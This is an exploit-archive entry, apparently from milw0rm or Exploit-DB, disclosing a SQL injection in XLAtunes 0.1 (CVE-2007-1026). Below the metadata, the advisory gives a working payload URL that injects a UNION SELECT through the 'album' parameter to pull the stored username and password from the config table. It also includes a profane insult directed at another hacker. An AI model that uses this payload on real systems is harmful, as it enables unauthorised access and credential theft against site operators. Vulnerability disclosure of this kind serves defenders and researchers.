XLAtunes 0.1 - 'album' SQL Injection

Author: Bl0od3r
type: webapps
platform: php
port: 
date_added: 2007-02-16  
date_updated:   
verified: 1  
codes: OSVDB-33743;CVE-2007-1026  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 3327.txt  

#Critical Status:High
#Found By:Bl0od3r
#Download:http://www.scriptdungeon.com/script.php?ScriptID=2844
#Greetz:all my friends
#fuckz:Don(h4cky0u) for steeling hacks of others,for his 100% noobility,for his noobass.DON your an idiot.fucka. -
#confkey->Password
#confvalue->Username
#Table:config
#http://host.com/path/?mode=view&album=-1%20UNION%20SELECT%20confkey%20FROM%20config/*

# milw0rm.com [2007-02-17]